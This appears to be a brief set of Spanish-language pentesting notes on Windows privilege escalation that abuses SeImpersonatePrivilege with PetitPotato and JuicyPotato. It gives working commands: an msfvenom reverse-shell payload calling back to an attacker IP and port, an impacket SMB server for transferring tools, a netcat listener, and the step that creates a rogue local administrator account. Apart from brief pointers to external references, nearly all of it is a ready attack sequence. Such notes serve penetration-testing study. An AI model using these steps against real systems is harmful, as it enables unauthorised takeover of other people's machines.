PetitPotato
primero revisamos de que permisos disponemos
vemos que tenemos SeimpersonatePrivilege así que ejecutamos PetitPotato.exe
Ahora podemos crearnos un usuario nuevo y hacerlo administrador de la maquina
Nos creamos el usuario superhacker y ya tenemos acceso a la maquina como admin local
Juicy Potato
Nos creamos un payload para establecer una revshell con msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o revshell.exe
Copiamos el binario Juicy Potato.exe a la máquina víctima, para ello podemos compartir un servidor smb en nuestra máquina kali
impacket-smbserver smb .
Copiamos el binario a la máquina víctima
\\ip atacante\smb\JuicyPotato.exe copy \\ip atacante\smb\JuicyPotato.exe
Y copiamos también el payload con el mismo comando cambiando el nombre del archivo.
Nos ponemos en escucha por el puerto 4444
nc -nlvp 4444
Ejecutamos JuicyPotato.exe con el CLSID que corresponda a nuestra versión de Windows server. Podemos consultar en esta web: Windows CLSID | juicy-potato (ohpe.it)
Mas información sobre como escalar privilegios en Abusing Tokens | HackTricks